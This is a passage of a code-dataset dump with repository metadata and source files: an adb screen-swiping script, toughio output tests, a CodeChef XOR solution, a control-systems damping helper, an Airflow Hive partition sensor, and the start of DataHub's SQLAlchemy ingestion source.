2218084076/hotpoor_autoclick_xhs
|
a52446ba691ac19e43410a465dc63f940c0e444d
|
[
"Apache-2.0"
] | 1
|
2021-10-09T10:28:57.000Z
|
2021-10-09T10:28:57.000Z
|
import os
import time

# Drive the connected Android device over adb: repeatedly swipe the feed
# up and down to scroll through content.
SWIPE_UP = "adb shell input swipe 340 1200 340 400 1000"
SWIPE_DOWN = "adb shell input swipe 340 600 340 1800 1000"
SWIPE_UP_SHORT = "adb shell input swipe 340 1400 340 200 1000"

for _ in range(50):
    os.system(SWIPE_UP)
    os.system(SWIPE_DOWN)
    time.sleep(1)
    os.system(SWIPE_UP_SHORT)
    time.sleep(2)  # let the UI settle before the next round
| 32.052632
| 87
| 0.692939
|
import os
import time
# Scroll the device screen via adb: swipe up, back down, then up again, 50 times.
for i in range(0,50):
    os.system("adb shell input swipe 340 1200 340 400 1000")  # swipe up (scroll down)
    os.system("adb shell input swipe 340 600 340 1800 1000")  # swipe back down
    time.sleep(1)
    os.system("adb shell input swipe 340 1400 340 200 1000")  # swipe up again
    time.sleep(2)  # pause so the UI can settle
| true
| true
|
f704ff4f170ca5bfc8ac19a642a71a7b7ae80975
| 4,955
|
py
|
Python
|
test/test_output.py
|
keurfonluu/toughio
|
1db0600ee5ad1abb5ca858c81c8ac5226c9dbb4f
|
[
"BSD-3-Clause-LBNL"
] | 21
|
2020-03-05T20:03:58.000Z
|
2022-03-14T23:17:42.000Z
|
test/test_output.py
|
keurfonluu/toughio
|
1db0600ee5ad1abb5ca858c81c8ac5226c9dbb4f
|
[
"BSD-3-Clause-LBNL"
] | 60
|
2020-02-14T22:53:01.000Z
|
2022-03-26T07:24:19.000Z
|
test/test_output.py
|
keurfonluu/toughio
|
1db0600ee5ad1abb5ca858c81c8ac5226c9dbb4f
|
[
"BSD-3-Clause-LBNL"
] | 6
|
2020-02-28T08:15:36.000Z
|
2022-03-13T23:26:24.000Z
|
import os
import helpers
import numpy
import pytest
import toughio
def write_read(output, writer_kws, reader_kws):
    """Round-trip ``output`` through toughio.write_output / toughio.read_output.

    Defined as a real function rather than a name-bound lambda (PEP 8 E731)
    so tracebacks and introspection show a proper name.
    """
    return helpers.write_read(
        "output",
        output,
        toughio.write_output,
        toughio.read_output,
        writer_kws=writer_kws,
        reader_kws=reader_kws,
    )
@pytest.mark.parametrize(
    "filename, data_ref",
    [
        (
            "FOFT_A1912.csv",
            {
                "TIME": 4.393722000e9,
                "PRES": 1.8740899675005e8,
                "TEMP": 720.0,
                "SAT_G": 0.0,
                "SAT_L": 24.0,
            },
        ),
        (
            "FOFT_A1912_T2.csv",
            {
                "TIME": 3.06639400e9,
                "PRES": 1.83000721e8,
                "TEMP": 660.0,
                "SAT_G": 0.0,
                "SAT_L": 22.0,
            },
        ),
        (
            "GOFT_A1162.csv",
            {"TIME": 4.393722000e9, "GEN": -30.0, "ENTG": 1.528048035348e7, "PWB": 0.0},
        ),
        (
            "GOFT_A1162_T2.csv",
            {"TIME": 3.06639400e9, "GEN": -27.5, "ENTG": 1.40141971e7, "PWB": 0.0},
        ),
    ],
)
def test_history(filename, data_ref):
    """FOFT/GOFT history files parse with the expected per-column sums."""
    this_dir = os.path.dirname(os.path.abspath(__file__))
    filename = os.path.join(this_dir, "support_files", "outputs", filename)
    data = toughio.read_history(filename)
    for k, v in data_ref.items():
        # Column-wise sums act as a compact fingerprint of the parsed values.
        assert numpy.allclose(v, data[k].sum())
@pytest.mark.parametrize(
    "filename, filename_ref",
    [
        ("OUTPUT_ELEME.csv", "SAVE.out"),
        ("OUTPUT_ELEME.tec", "SAVE.out"),
        ("OUTPUT_ELEME_PETRASIM.csv", "SAVE.out"),
        ("OUTPUT.out", "SAVE.out"),
        ("OUTPUT_6.out", "SAVE_6.out"),
    ],
)
def test_output_eleme(filename, filename_ref):
    """Element outputs parse consistently with the matching SAVE file."""
    this_dir = os.path.dirname(os.path.abspath(__file__))
    filename = os.path.join(this_dir, "support_files", "outputs", filename)
    outputs = toughio.read_output(filename)
    filename = os.path.join(this_dir, "support_files", "outputs", filename_ref)
    save = toughio.read_output(filename)
    assert len(outputs) == 5
    times_ref = [
        0.2592000e08,
        0.3155800e08,
        0.1577900e09,
        0.3155800e09,
        0.7889400e09,
    ]
    keys_ref = ["POR", "PRES", "SAT_G", "TEMP", "X", "Y", "Z"]
    for output, time_ref in zip(outputs, times_ref):
        assert time_ref == output.time
        # Label availability depends on the output format.
        assert (
            save.labels.tolist() == output.labels.tolist()
            if output.format in {"csv", "petrasim", "tough"}
            else output.labels == None
        )
        if output.format != "tough":
            assert keys_ref == sorted(list(output.data.keys()))
    # The last time step must agree with the SAVE file's primary variables.
    assert numpy.allclose(save.data["X1"], outputs[-1].data["PRES"])
    assert numpy.allclose(save.data["X2"], outputs[-1].data["TEMP"], atol=0.1)
@pytest.mark.parametrize(
    "filename",
    ["OUTPUT_CONNE.csv", "OUTPUT.out", "OUTPUT_6.out"],
)
def test_output_conne(filename):
    """Connection outputs parse with expected times and mean HEAT values."""
    this_dir = os.path.dirname(os.path.abspath(__file__))
    filename = os.path.join(this_dir, "support_files", "outputs", filename)
    outputs = toughio.read_output(filename, connection=True)
    times_ref = [
        0.2592000e08,
        0.3155800e08,
        0.1577900e09,
        0.3155800e09,
        0.7889400e09,
    ]
    data_ref = [
        52542.0,
        52475.0,
        51146.0,
        49600.0,
        45623.0,
    ]
    for output, time_ref, data in zip(outputs, times_ref, data_ref):
        assert time_ref == output.time
        # Each connection label pair must be unique (one HEAT value per pair).
        assert (
            len(set("".join(labels) for labels in output.labels))
            == output.data["HEAT"].size
        )
        assert numpy.allclose(data, numpy.abs(output.data["HEAT"]).mean(), atol=1.0)
@pytest.mark.parametrize(
    "output_ref, file_format",
    [
        (helpers.output_eleme, "csv"),
        (helpers.output_eleme[0], "csv"),
        (helpers.output_eleme, "petrasim"),
        (helpers.output_eleme[0], "petrasim"),
        (helpers.output_eleme, "tecplot"),
        (helpers.output_eleme[0], "tecplot"),
        (helpers.output_conne, "csv"),
        (helpers.output_conne[0], "csv"),
    ],
)
def test_output(output_ref, file_format):
    """Write-then-read round trip preserves outputs for every file format."""
    output = write_read(
        output=output_ref,
        writer_kws={"file_format": file_format},
        reader_kws={},
    )
    # A single output is normalized to a one-element list for comparison.
    output_ref = output_ref if isinstance(output_ref, list) else [output_ref]
    for out_ref, out in zip(output_ref, output):
        helpers.allclose_output(out_ref, out)
def test_save():
    """SAVE files parse with the expected primary-variable means."""
    support_dir = os.path.dirname(os.path.abspath(__file__))
    path = os.path.join(support_dir, "support_files", "outputs", "SAVE.out")
    save = toughio.read_output(path)
    expected_means = [6.35804123e05, 1.42894499e02, 9.91868799e-01]
    primary_vars = [save.data["X1"], save.data["X2"], save.data["X3"]]
    assert numpy.allclose(expected_means, numpy.mean(primary_vars, axis=1))
    assert numpy.allclose(0.01, save.data["porosity"].mean())
    assert "userx" not in save.data.keys()
| 28.641618
| 88
| 0.574975
|
import os
import helpers
import numpy
import pytest
import toughio
def write_read(output, writer_kws, reader_kws):
    """Round-trip ``output`` through toughio.write_output / toughio.read_output.

    Defined as a real function rather than a name-bound lambda (PEP 8 E731)
    so tracebacks and introspection show a proper name.
    """
    return helpers.write_read(
        "output",
        output,
        toughio.write_output,
        toughio.read_output,
        writer_kws=writer_kws,
        reader_kws=reader_kws,
    )
@pytest.mark.parametrize(
    "filename, data_ref",
    [
        (
            "FOFT_A1912.csv",
            {
                "TIME": 4.393722000e9,
                "PRES": 1.8740899675005e8,
                "TEMP": 720.0,
                "SAT_G": 0.0,
                "SAT_L": 24.0,
            },
        ),
        (
            "FOFT_A1912_T2.csv",
            {
                "TIME": 3.06639400e9,
                "PRES": 1.83000721e8,
                "TEMP": 660.0,
                "SAT_G": 0.0,
                "SAT_L": 22.0,
            },
        ),
        (
            "GOFT_A1162.csv",
            {"TIME": 4.393722000e9, "GEN": -30.0, "ENTG": 1.528048035348e7, "PWB": 0.0},
        ),
        (
            "GOFT_A1162_T2.csv",
            {"TIME": 3.06639400e9, "GEN": -27.5, "ENTG": 1.40141971e7, "PWB": 0.0},
        ),
    ],
)
def test_history(filename, data_ref):
    """FOFT/GOFT history files parse with the expected per-column sums."""
    this_dir = os.path.dirname(os.path.abspath(__file__))
    filename = os.path.join(this_dir, "support_files", "outputs", filename)
    data = toughio.read_history(filename)
    for k, v in data_ref.items():
        # Column-wise sums act as a compact fingerprint of the parsed values.
        assert numpy.allclose(v, data[k].sum())
@pytest.mark.parametrize(
    "filename, filename_ref",
    [
        ("OUTPUT_ELEME.csv", "SAVE.out"),
        ("OUTPUT_ELEME.tec", "SAVE.out"),
        ("OUTPUT_ELEME_PETRASIM.csv", "SAVE.out"),
        ("OUTPUT.out", "SAVE.out"),
        ("OUTPUT_6.out", "SAVE_6.out"),
    ],
)
def test_output_eleme(filename, filename_ref):
    """Element outputs parse consistently with the matching SAVE file."""
    this_dir = os.path.dirname(os.path.abspath(__file__))
    filename = os.path.join(this_dir, "support_files", "outputs", filename)
    outputs = toughio.read_output(filename)
    filename = os.path.join(this_dir, "support_files", "outputs", filename_ref)
    save = toughio.read_output(filename)
    assert len(outputs) == 5
    times_ref = [
        0.2592000e08,
        0.3155800e08,
        0.1577900e09,
        0.3155800e09,
        0.7889400e09,
    ]
    keys_ref = ["POR", "PRES", "SAT_G", "TEMP", "X", "Y", "Z"]
    for output, time_ref in zip(outputs, times_ref):
        assert time_ref == output.time
        # Label availability depends on the output format.
        assert (
            save.labels.tolist() == output.labels.tolist()
            if output.format in {"csv", "petrasim", "tough"}
            else output.labels == None
        )
        if output.format != "tough":
            assert keys_ref == sorted(list(output.data.keys()))
    # The last time step must agree with the SAVE file's primary variables.
    assert numpy.allclose(save.data["X1"], outputs[-1].data["PRES"])
    assert numpy.allclose(save.data["X2"], outputs[-1].data["TEMP"], atol=0.1)
@pytest.mark.parametrize(
    "filename",
    ["OUTPUT_CONNE.csv", "OUTPUT.out", "OUTPUT_6.out"],
)
def test_output_conne(filename):
    """Connection outputs parse with expected times and mean HEAT values."""
    this_dir = os.path.dirname(os.path.abspath(__file__))
    filename = os.path.join(this_dir, "support_files", "outputs", filename)
    outputs = toughio.read_output(filename, connection=True)
    times_ref = [
        0.2592000e08,
        0.3155800e08,
        0.1577900e09,
        0.3155800e09,
        0.7889400e09,
    ]
    data_ref = [
        52542.0,
        52475.0,
        51146.0,
        49600.0,
        45623.0,
    ]
    for output, time_ref, data in zip(outputs, times_ref, data_ref):
        assert time_ref == output.time
        # Each connection label pair must be unique (one HEAT value per pair).
        assert (
            len(set("".join(labels) for labels in output.labels))
            == output.data["HEAT"].size
        )
        assert numpy.allclose(data, numpy.abs(output.data["HEAT"]).mean(), atol=1.0)
@pytest.mark.parametrize(
    "output_ref, file_format",
    [
        (helpers.output_eleme, "csv"),
        (helpers.output_eleme[0], "csv"),
        (helpers.output_eleme, "petrasim"),
        (helpers.output_eleme[0], "petrasim"),
        (helpers.output_eleme, "tecplot"),
        (helpers.output_eleme[0], "tecplot"),
        (helpers.output_conne, "csv"),
        (helpers.output_conne[0], "csv"),
    ],
)
def test_output(output_ref, file_format):
    """Write-then-read round trip preserves outputs for every file format."""
    output = write_read(
        output=output_ref,
        writer_kws={"file_format": file_format},
        reader_kws={},
    )
    # A single output is normalized to a one-element list for comparison.
    output_ref = output_ref if isinstance(output_ref, list) else [output_ref]
    for out_ref, out in zip(output_ref, output):
        helpers.allclose_output(out_ref, out)
def test_save():
    """SAVE files parse with the expected primary-variable means."""
    this_dir = os.path.dirname(os.path.abspath(__file__))
    filename = os.path.join(this_dir, "support_files", "outputs", "SAVE.out")
    save = toughio.read_output(filename)
    # Expected means of the three primary variables across all elements.
    x_ref = [6.35804123e05, 1.42894499e02, 9.91868799e-01]
    assert numpy.allclose(
        x_ref, numpy.mean([save.data["X1"], save.data["X2"], save.data["X3"]], axis=1)
    )
    assert numpy.allclose(0.01, save.data["porosity"].mean())
    assert "userx" not in save.data.keys()
| true
| true
|
f70501b6041b222ae4cdc6349c3646848546cf5f
| 271
|
py
|
Python
|
CodeChef_problems/XORAGN/solution.py
|
gbrls/CompetitiveCode
|
b6f1b817a655635c3c843d40bd05793406fea9c6
|
[
"MIT"
] | 165
|
2020-10-03T08:01:11.000Z
|
2022-03-31T02:42:08.000Z
|
CodeChef_problems/XORAGN/solution.py
|
gbrls/CompetitiveCode
|
b6f1b817a655635c3c843d40bd05793406fea9c6
|
[
"MIT"
] | 383
|
2020-10-03T07:39:11.000Z
|
2021-11-20T07:06:35.000Z
|
CodeChef_problems/XORAGN/solution.py
|
gbrls/CompetitiveCode
|
b6f1b817a655635c3c843d40bd05793406fea9c6
|
[
"MIT"
] | 380
|
2020-10-03T08:05:04.000Z
|
2022-03-19T06:56:59.000Z
|
# Question link: https://www.codechef.com/problems/XORAGN
# For each test case, the answer is twice the XOR of all array elements.
t = int(input())
for _ in range(t):
    _n = int(input())  # element count; the next line's split consumes all values
    acc = 0
    for value in map(int, input().split()):
        acc ^= value
    print(2 * acc)
| 24.636364
| 49
| 0.645756
|
# CodeChef XORAGN: print twice the XOR of all array elements, per test case.
t=int(input())
for a0 in range(t):
    n=int(input())  # array length (unused; the split below reads all values)
    a=list(map(int,input().split()))
    res=0
    for i in a:
        res=res^i  # fold XOR over all values
    print(2*res)  # answer is double the aggregate XOR
| true
| true
|
f705031b38df3c5a63196a68e3910cb0f10187d4
| 716
|
py
|
Python
|
control_plotly/utils.py
|
vincentchoqueuse/python-control-plotly
|
5f4f7d354d4de2628ea52a5e544ebeb138d106bc
|
[
"MIT"
] | 3
|
2021-08-17T19:21:22.000Z
|
2021-08-23T17:58:52.000Z
|
control_plotly/utils.py
|
vincentchoqueuse/python-control-plotly
|
5f4f7d354d4de2628ea52a5e544ebeb138d106bc
|
[
"MIT"
] | null | null | null |
control_plotly/utils.py
|
vincentchoqueuse/python-control-plotly
|
5f4f7d354d4de2628ea52a5e544ebeb138d106bc
|
[
"MIT"
] | null | null | null |
import control as ctl
import numpy as np
def damp(sys, display=False):
    """Return (wn_list, m_list, pole_list) for the poles of ``sys``.

    Handles both continuous- and discrete-time systems: discrete poles are
    mapped to the s-plane via log(z)/dt before computing natural frequency
    and damping ratio.
    """
    poles = []
    dampings = []
    frequencies = []
    for p in sys.pole():
        # Explicit complex cast so np.log behaves on real-valued pole arrays.
        p = p.astype(complex)
        s_pole = p if ctl.isctime(sys) else np.log(p) / sys.dt
        wn = np.abs(s_pole)
        zeta = -np.real(s_pole) / wn
        poles.append(p)
        frequencies.append(wn)
        dampings.append(zeta)
        if display:
            print("pole {:.3f} : wn={:.3f} rad/s, m= {:.3f}".format(p, wn, zeta))
    return frequencies, dampings, poles
| 24.689655
| 113
| 0.564246
|
import control as ctl
import numpy as np
def damp(sys,display=False):
    """Return (wn_list, m_list, pole_list) for the poles of ``sys``."""
    pole_list = []
    m_list = []
    wn_list = []
    for pole in sys.pole():
        # Cast to complex so np.log below behaves for real-valued pole arrays.
        pole = pole.astype(complex)
        if ctl.isctime(sys):
            pole_continuous = pole
        else:
            # Discrete-time pole: map from z-plane to s-plane via log(z)/dt.
            pole_continuous = np.log(pole)/sys.dt
        wn = np.abs(pole_continuous)
        m = -np.real(pole_continuous)/wn
        pole_list.append(pole)
        wn_list.append(wn)
        m_list.append(m)
        if display:
            print("pole {:.3f} : wn={:.3f} rad/s, m= {:.3f}".format(pole, wn, m))
    return wn_list, m_list, pole_list
| true
| true
|
f705039b1f57c4a0a916cbfd3c1650721de1f279
| 3,014
|
py
|
Python
|
airflow/providers/apache/hive/sensors/hive_partition.py
|
Hartorn/airflow
|
a79e2d4c4aa105f3fac5ae6a28e29af9cd572407
|
[
"Apache-2.0"
] | 3
|
2015-08-25T13:56:44.000Z
|
2020-03-21T10:26:58.000Z
|
airflow/providers/apache/hive/sensors/hive_partition.py
|
Hartorn/airflow
|
a79e2d4c4aa105f3fac5ae6a28e29af9cd572407
|
[
"Apache-2.0"
] | 37
|
2020-07-21T07:50:02.000Z
|
2022-03-29T22:31:28.000Z
|
airflow/providers/apache/hive/sensors/hive_partition.py
|
vuppalli/airflow
|
dfe8337ca2d3ed173d9ecc112938271519792c40
|
[
"Apache-2.0"
] | 2
|
2018-07-24T08:54:45.000Z
|
2018-08-31T13:41:50.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from airflow.providers.apache.hive.hooks.hive import HiveMetastoreHook
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
class HivePartitionSensor(BaseSensorOperator):
    """
    Waits for a partition to show up in Hive.

    Note: Because ``partition`` supports general logical operators, it
    can be inefficient. Consider using NamedHivePartitionSensor instead if
    you don't need the full flexibility of HivePartitionSensor.

    :param table: The name of the table to wait for, supports the dot
        notation (my_database.my_table)
    :type table: str
    :param partition: The partition clause to wait for. This is passed as
        is to the metastore Thrift client ``get_partitions_by_filter`` method,
        and apparently supports SQL like notation as in ``ds='2015-01-01'
        AND type='value'`` and comparison operators as in ``"ds>=2015-01-01"``
    :type partition: str
    :param metastore_conn_id: reference to the metastore thrift service
        connection id
    :type metastore_conn_id: str
    """
    template_fields = ('schema', 'table', 'partition',)
    ui_color = '#C5CAE9'

    @apply_defaults
    def __init__(self,
                 table, partition="ds='{{ ds }}'",
                 metastore_conn_id='metastore_default',
                 schema='default',
                 poke_interval=60 * 3,
                 *args,
                 **kwargs):
        super().__init__(
            poke_interval=poke_interval, *args, **kwargs)
        if not partition:
            # Preserve the templated default when callers pass None or ''.
            partition = "ds='{{ ds }}'"
        self.metastore_conn_id = metastore_conn_id
        self.table = table
        self.partition = partition
        self.schema = schema

    def poke(self, context):
        """Return True once the requested partition exists in the metastore."""
        if '.' in self.table:
            # Dot notation overrides the configured schema.
            self.schema, self.table = self.table.split('.')
        self.log.info(
            'Poking for table %s.%s, partition %s', self.schema, self.table, self.partition
        )
        # Bug fix: the hook was previously assigned to a *local* variable, so
        # the hasattr() guard never became true (a fresh metastore client was
        # built on every poke), and had self.hook ever been set the return
        # below would have raised NameError. Cache the hook on the instance.
        if not hasattr(self, 'hook'):
            self.hook = HiveMetastoreHook(
                metastore_conn_id=self.metastore_conn_id)
        return self.hook.check_for_partition(
            self.schema, self.table, self.partition)
| 40.186667
| 91
| 0.674851
|
from airflow.providers.apache.hive.hooks.hive import HiveMetastoreHook
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
class HivePartitionSensor(BaseSensorOperator):
    """Waits for a partition to show up in Hive (see NamedHivePartitionSensor
    for a faster alternative when general partition filters are not needed)."""
    template_fields = ('schema', 'table', 'partition',)
    ui_color = '#C5CAE9'

    @apply_defaults
    def __init__(self,
                 table, partition="ds='{{ ds }}'",
                 metastore_conn_id='metastore_default',
                 schema='default',
                 poke_interval=60 * 3,
                 *args,
                 **kwargs):
        super().__init__(
            poke_interval=poke_interval, *args, **kwargs)
        if not partition:
            # Preserve the templated default when callers pass None or ''.
            partition = "ds='{{ ds }}'"
        self.metastore_conn_id = metastore_conn_id
        self.table = table
        self.partition = partition
        self.schema = schema

    def poke(self, context):
        """Return True once the requested partition exists in the metastore."""
        if '.' in self.table:
            # Dot notation overrides the configured schema.
            self.schema, self.table = self.table.split('.')
        self.log.info(
            'Poking for table %s.%s, partition %s', self.schema, self.table, self.partition
        )
        # Bug fix: the hook was previously assigned to a *local* variable, so
        # the hasattr() guard never became true (a fresh metastore client was
        # built on every poke), and had self.hook ever been set the return
        # below would have raised NameError. Cache the hook on the instance.
        if not hasattr(self, 'hook'):
            self.hook = HiveMetastoreHook(
                metastore_conn_id=self.metastore_conn_id)
        return self.hook.check_for_partition(
            self.schema, self.table, self.partition)
| true
| true
|
f7050439ef98c033793027024ec1d306c91c767c
| 15,018
|
py
|
Python
|
metadata-ingestion/src/datahub/ingestion/source/sql_common.py
|
hmjahle/datahub_upstream
|
62d5306a28e0df6b6b67a5f46c01dd508caada60
|
[
"Apache-2.0"
] | null | null | null |
metadata-ingestion/src/datahub/ingestion/source/sql_common.py
|
hmjahle/datahub_upstream
|
62d5306a28e0df6b6b67a5f46c01dd508caada60
|
[
"Apache-2.0"
] | null | null | null |
metadata-ingestion/src/datahub/ingestion/source/sql_common.py
|
hmjahle/datahub_upstream
|
62d5306a28e0df6b6b67a5f46c01dd508caada60
|
[
"Apache-2.0"
] | null | null | null |
import logging
from abc import abstractmethod
from dataclasses import dataclass, field
from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Type
from urllib.parse import quote_plus
import pydantic
from sqlalchemy import create_engine, inspect
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.sql import sqltypes as types
from datahub.configuration.common import AllowDenyPattern, ConfigModel
from datahub.emitter.mce_builder import DEFAULT_ENV
from datahub.ingestion.api.common import PipelineContext
from datahub.ingestion.api.source import Source, SourceReport
from datahub.ingestion.api.workunit import MetadataWorkUnit
from datahub.metadata.com.linkedin.pegasus2avro.metadata.snapshot import DatasetSnapshot
from datahub.metadata.com.linkedin.pegasus2avro.mxe import MetadataChangeEvent
from datahub.metadata.com.linkedin.pegasus2avro.schema import (
ArrayTypeClass,
BooleanTypeClass,
BytesTypeClass,
DateTypeClass,
EnumTypeClass,
MySqlDDL,
NullTypeClass,
NumberTypeClass,
RecordTypeClass,
SchemaField,
SchemaFieldDataType,
SchemaMetadata,
StringTypeClass,
TimeTypeClass,
)
from datahub.metadata.schema_classes import DatasetPropertiesClass
logger: logging.Logger = logging.getLogger(__name__)
def make_sqlalchemy_uri(
    scheme: str,
    username: Optional[str],
    password: Optional[str],
    at: Optional[str],
    db: Optional[str],
    uri_opts: Optional[Dict[str, Any]] = None,
) -> str:
    """Assemble a SQLAlchemy connection URI from its individual parts.

    Username and password are percent-encoded; entries of ``uri_opts`` with
    falsy values are dropped from the query string.
    """
    pieces = [f"{scheme}://"]
    if username is not None:
        pieces.append(quote_plus(username))
    if password is not None:
        pieces.append(f":{quote_plus(password)}")
    pieces.append("@")
    if at is not None:
        pieces.append(at)
    if db is not None:
        pieces.append(f"/{db}")
    url = "".join(pieces)
    if uri_opts is not None:
        if db is None:
            url += "/"
        query = "&".join(
            f"{key}={quote_plus(value)}" for key, value in uri_opts.items() if value
        )
        url = f"{url}?{query}"
    return url
@dataclass
class SQLSourceReport(SourceReport):
    """Ingestion report counting scanned tables/views and filtered entities."""

    tables_scanned: int = 0
    views_scanned: int = 0
    filtered: List[str] = field(default_factory=list)

    def report_entity_scanned(self, name: str, ent_type: str = "table") -> None:
        """Record that a table or view was scanned; rejects other kinds."""
        if ent_type == "view":
            self.views_scanned += 1
        elif ent_type == "table":
            self.tables_scanned += 1
        else:
            raise KeyError(f"Unknown entity {ent_type}.")

    def report_dropped(self, ent_name: str) -> None:
        """Record an entity skipped by the allow/deny patterns."""
        self.filtered.append(ent_name)
class SQLAlchemyConfig(ConfigModel):
    """Base configuration shared by all SQLAlchemy-backed ingestion sources."""
    env: str = DEFAULT_ENV
    options: dict = {}
    # Although the 'table_pattern' enables you to skip everything from certain schemas,
    # having another option to allow/deny on schema level is an optimization for the case when there is a large number
    # of schemas that one wants to skip and you want to avoid the time to needlessly fetch those tables only to filter
    # them out afterwards via the table_pattern.
    schema_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
    table_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
    view_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
    include_views: Optional[bool] = True
    include_tables: Optional[bool] = True
    @abstractmethod
    def get_sql_alchemy_url(self):
        """Return the SQLAlchemy connection URL; implemented per dialect."""
        pass
    def get_identifier(self, schema: str, table: str) -> str:
        """Build the dataset identifier; dialects may override the format."""
        return f"{schema}.{table}"
    def standardize_schema_table_names(
        self, schema: str, entity: str
    ) -> Tuple[str, str]:
        # Some SQLAlchemy dialects need a standardization step to clean the schema
        # and table names. See BigQuery for an example of when this is useful.
        return schema, entity
class BasicSQLAlchemyConfig(SQLAlchemyConfig):
    """Connection settings for sources reachable via host/port credentials."""

    username: Optional[str] = None
    password: Optional[pydantic.SecretStr] = None
    host_port: str
    database: Optional[str] = None
    database_alias: Optional[str] = None
    scheme: str

    def get_sql_alchemy_url(self, uri_opts=None):
        """Build the connection URL, unwrapping the secret password."""
        plaintext_password = self.password.get_secret_value() if self.password else None
        return make_sqlalchemy_uri(
            self.scheme,
            self.username,
            plaintext_password,
            self.host_port,
            self.database,
            uri_opts=uri_opts,
        )
@dataclass
class SqlWorkUnit(MetadataWorkUnit):
    """Marker work-unit subclass emitted by SQL-based sources (no extra state)."""
    pass
# Mapping from SQLAlchemy's type hierarchy to metadata schema type classes.
# get_column_type checks entries with isinstance() in declaration order.
_field_type_mapping: Dict[Type[types.TypeEngine], Type] = {
    types.Integer: NumberTypeClass,
    types.Numeric: NumberTypeClass,
    types.Boolean: BooleanTypeClass,
    types.Enum: EnumTypeClass,
    types._Binary: BytesTypeClass,
    types.LargeBinary: BytesTypeClass,
    types.PickleType: BytesTypeClass,
    types.ARRAY: ArrayTypeClass,
    types.String: StringTypeClass,
    types.Date: DateTypeClass,
    types.DATE: DateTypeClass,
    types.Time: TimeTypeClass,
    types.DateTime: TimeTypeClass,
    types.DATETIME: TimeTypeClass,
    types.TIMESTAMP: TimeTypeClass,
    types.JSON: RecordTypeClass,
    # When SQLAlchemy is unable to map a type into its internally hierarchy, it
    # assigns the NullType by default. We want to carry this warning through.
    types.NullType: NullTypeClass,
}
# Types we recognise but deliberately map to NullType without emitting a
# "unable to map" warning.
_known_unknown_field_types: Set[Type[types.TypeEngine]] = {
    types.Interval,
    types.CLOB,
}
def register_custom_type(
    tp: Type[types.TypeEngine], output: Optional[Type] = None
) -> None:
    """Register a dialect-specific SQLAlchemy type.

    With ``output`` given, ``tp`` maps to that schema class; otherwise it is
    recorded as known-but-unmappable (later reported as NullType silently).
    """
    if output is None:
        _known_unknown_field_types.add(tp)
    else:
        _field_type_mapping[tp] = output
class _CustomSQLAlchemyDummyType(types.TypeDecorator):
    # Placeholder base for make_sqlalchemy_type; these classes are only used
    # for isinstance matching, never for actual column I/O.
    impl = types.LargeBinary
def make_sqlalchemy_type(name: str) -> Type[types.TypeEngine]:
    """Dynamically create a named dummy SQLAlchemy type class.

    Uses the three-argument form of ``type()`` to construct the class; see
    https://docs.python.org/3/library/functions.html#type and
    https://stackoverflow.com/a/15247202/5004662.
    """
    class_attrs = {"__repr__": lambda self: f"{name}()"}
    return type(name, (_CustomSQLAlchemyDummyType,), class_attrs)
def get_column_type(
    sql_report: SQLSourceReport, dataset_name: str, column_type: Any
) -> SchemaFieldDataType:
    """Map a SQLAlchemy column type to the metadata schema type wrapper.

    Unknown types fall back to NullType; a warning is reported only when the
    type is not in the known-unmappable set.
    """
    resolved: Optional[Type] = next(
        (
            mapped
            for sql_type, mapped in _field_type_mapping.items()
            if isinstance(column_type, sql_type)
        ),
        None,
    )
    if resolved is None and any(
        isinstance(column_type, sql_type) for sql_type in _known_unknown_field_types
    ):
        resolved = NullTypeClass
    if resolved is None:
        sql_report.report_warning(
            dataset_name, f"unable to map type {column_type!r} to metadata schema"
        )
        resolved = NullTypeClass
    return SchemaFieldDataType(type=resolved())
def get_schema_metadata(
    sql_report: SQLSourceReport, dataset_name: str, platform: str, columns: List[dict]
) -> SchemaMetadata:
    """Build a SchemaMetadata aspect from SQLAlchemy column dictionaries."""
    schema_fields = [
        SchemaField(
            fieldPath=column["name"],
            type=get_column_type(sql_report, dataset_name, column["type"]),
            nativeDataType=column.get("full_type", repr(column["type"])),
            description=column.get("comment", None),
            nullable=column["nullable"],
            recursive=False,
        )
        for column in columns
    ]
    return SchemaMetadata(
        schemaName=dataset_name,
        platform=f"urn:li:dataPlatform:{platform}",
        version=0,
        hash="",
        platformSchema=MySqlDDL(tableSchema=""),
        fields=schema_fields,
    )
class SQLAlchemySource(Source):
"""A Base class for all SQL Sources that use SQLAlchemy to extend"""
    def __init__(self, config: SQLAlchemyConfig, ctx: PipelineContext, platform: str):
        """Store the config and platform name and start a fresh report."""
        super().__init__(ctx)
        self.config = config
        # Platform string is embedded in every emitted dataset URN.
        self.platform = platform
        self.report = SQLSourceReport()
def get_inspectors(self) -> Iterable[Inspector]:
# This method can be overridden in the case that you want to dynamically
# run on multiple databases.
url = self.config.get_sql_alchemy_url()
logger.debug(f"sql_alchemy_url={url}")
engine = create_engine(url, **self.config.options)
inspector = inspect(engine)
yield inspector
def get_workunits(self) -> Iterable[SqlWorkUnit]:
sql_config = self.config
if logger.isEnabledFor(logging.DEBUG):
# If debug logging is enabled, we also want to echo each SQL query issued.
sql_config.options["echo"] = True
for inspector in self.get_inspectors():
for schema in inspector.get_schema_names():
if not sql_config.schema_pattern.allowed(schema):
self.report.report_dropped(f"{schema}.*")
continue
if sql_config.include_tables:
yield from self.loop_tables(inspector, schema, sql_config)
if sql_config.include_views:
yield from self.loop_views(inspector, schema, sql_config)
def loop_tables(
self,
inspector: Inspector,
schema: str,
sql_config: SQLAlchemyConfig,
) -> Iterable[SqlWorkUnit]:
for table in inspector.get_table_names(schema):
schema, table = sql_config.standardize_schema_table_names(schema, table)
dataset_name = sql_config.get_identifier(schema, table)
self.report.report_entity_scanned(dataset_name, ent_type="table")
